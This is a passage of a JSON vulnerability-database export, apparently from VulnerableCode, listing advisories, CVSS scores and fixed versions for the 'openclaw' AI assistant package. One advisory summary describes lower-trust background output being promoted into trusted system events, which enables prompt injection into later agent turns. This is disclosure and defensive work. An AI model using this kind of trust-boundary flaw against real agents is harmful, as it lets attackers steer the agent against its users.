"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing" }, { "reference_url": "https://github.com/advisories/GHSA-3h52-cx59-c456", "reference_id": "GHSA-3h52-cx59-c456", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3h52-cx59-c456" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35640", "GHSA-3h52-cx59-c456" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4uqc-3h1c-4yhs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89602?format=api", "vulnerability_id": "VCID-4urc-4536-pqhk", "summary": "OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade\n## Impact\n\nLower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade.\n\nLower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x" }, { "reference_url": "https://github.com/advisories/GHSA-gfmx-pph7-g46x", "reference_id": "GHSA-gfmx-pph7-g46x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gfmx-pph7-g46x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "GHSA-gfmx-pph7-g46x" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4urc-4536-pqhk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90905?format=api", "vulnerability_id": "VCID-5atj-2a7b-57g5", "summary": "OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose`\n## Summary\n\nThe `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`.\n\n## Impact\n\nA write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended.\n\n## Affected Component\n\n`src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41344", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24925", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24857", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41344" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41344", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41344" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter" }, { "reference_url": "https://github.com/advisories/GHSA-5h2w-qmfp-ggp6", "reference_id": "GHSA-5h2w-qmfp-ggp6", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5h2w-qmfp-ggp6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { 